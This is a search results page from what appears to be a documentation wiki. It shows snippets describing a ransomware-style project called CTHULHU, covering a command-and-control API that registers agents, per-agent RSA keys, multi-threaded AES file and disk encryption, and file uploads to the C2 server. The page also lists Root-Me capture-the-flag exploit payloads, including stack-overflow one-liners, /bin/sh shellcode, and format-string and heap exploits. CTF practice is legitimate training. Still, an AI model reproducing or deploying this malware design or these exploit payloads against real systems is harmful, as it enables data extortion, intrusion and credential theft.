Advanced Search
Search Results
77 total results found
License
MIT License Copyright (c) 2023 Ashguard Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation...
Base URL
The API create its own nodejs server at this address http://localhost:5000/
Endpoints
Create a New Agent URL: /api/agent/new Method: POST Description: Create a new agent and store its information in a MySQL database. Request Body: versionOS (required): The version of the operating system running on the agent. host (required): The host...
Database Connection
The API connects to a MySQL database for storing agent information. The database connection details are specified using environment variables: DB_HOST: The host name or IP address of the MySQL database. DB_USER: The username for accessing the MySQL database...
User Folder Creation
The API creates a folder named /CTHULHU/users if it doesn't already exist. Additionally, for each agent created, a user-specific folder is created within /CTHULHU/users. Folder Structure The folder structure is as follows: /CTHULHU /users /<agentId_1> ...
RSA Key Pair Generation and Storage
For each agent created, the API generates an RSA key pair consisting of a public key and a private key. The key pair is generated using a modulus length of 4096 bits. The generated keys are stored in the MySQL database along with other agent information. Key G...
Docker Compose Setup
To simplify the deployment and management of the API and its dependencies, Docker Compose is used. The docker-compose.yml file defines the services and their configurations. docker-compose.yml version: '3.1' services: mariadb: image: mariadb restart...
Ecryption / Decryption for external disk
Function Description The code snippet defines a function named encrypt_decrypt_external_disks with the following signature: pub fn encrypt_decrypt_external_disks(private_public_key: String, user_id: String, is_encryption: u8) Parameters private_public_key (...
Encryption / Decryption files
Overview This code provides functions for encrypting and decrypting files using AES-256 CTR encryption. It supports multi-threaded encryption and decryption of files in a specified directory. The encryption is performed using RSA public-key cryptography, where...
API connection
Overview This code provides a C2API struct that encapsulates functionalities related to interacting with a command and control (C2) API. It includes methods for making POST and GET requests, retrieving public IP information, and uploading files to the C2 serve...
Main.rs
Overview This code represents an entry point for a program that performs certain actions based on command-line arguments. It imports and utilizes modules c2, encryption, and system for various functionalities related to interacting with a C2 API, encryption, a...
ELF x64 - Stack buffer overflow - PIE
shell 1: app-systeme-ch83@challenge03:~$ python -c 'import struct; print("A"*0x28 + struct.pack("<Q",0x55fc7235191a - 0xa0))' > /tmp/ezeqielle app-systeme-ch83@challenge03:~$ cat /tmp/ezeqielle | ./ch83 I'm an unbreakable safe, so you need a key to enter! Hint...
ELF x86 - Stack buffer overflow basic 2
$ (python -c 'print "A"*128 +"\x64\x84\x04\x08" ' ;cat) | ./ch15
ELF x64 - Stack buffer overflow - basic
$ (python -c 'print "A"*280+"\xcd\x06\x40\x00\x00\x00\x00\x00"'; cat) | ./ch35
ELF x86 - Format string bug basic 2
import struct CHECK_ADDR = <addr> exploit = "" exploit += struct.pack("I", CHECK_ADDR) # $9 exploit += struct.pack("I", CHECK_ADDR + 1) # $10 exploit += struct.pack("I", CHECK_ADDR + 2) # $11 exploit += struct.pack("I", CHECK_ADDR + 3) # $12 expl...
ELF x86 - BSS buffer overflow
./ch7 `python -c 'print "\x90"*483 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xac\xfd\xff\xbf"' [+] Running program with username : ���������������������������������������������...
ELF x64 - Basic heap overflow
import pwn USER = "app-systeme-ch94" PASS = "app-systeme-ch94" def main(): s = pwn.ssh(USER, "challenge03.root-me.org", 2223, PASS) io = s.process('ch94') data = "A"*(0x20+8+8) data += 'cat .p* ' pwn.log.info(f"Payload with len {len(data)} : {data}") io....
ELF x64 - Double free
"1 → 5 → 1 → 3 → 7 → 1 → 4 → 5 → 1 → 5 → 2 → 1 → 7 → 1"
ELF x86 - Use After Free - basic
app-systeme-ch63@challenge03:~$ printf "1\ntoto\n4\n5\nAAAABBBBCCCC\xcb\x87\x04\ x08\nhome\n7\n3\n" | ./ch63 1: Buy a dog 2: Make him bark 3: Bring me the flag 4: Watch his death 5: Build dog house 6: Give dog house to your dog 7: Break dog house 0: Quit How d...
ELF x86 - Stack buffer overflow basic 6
app-systeme-ch33@challenge02:~$ ./ch33 $(python -c 'print "A"*32 + "\xb0\x70\xe6\xb7" + "\xf0\xab\xe5\xb7" + "\xfd\xfd\xff\xbf"') Your message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�p���������� sh-4.2$ cat .passwd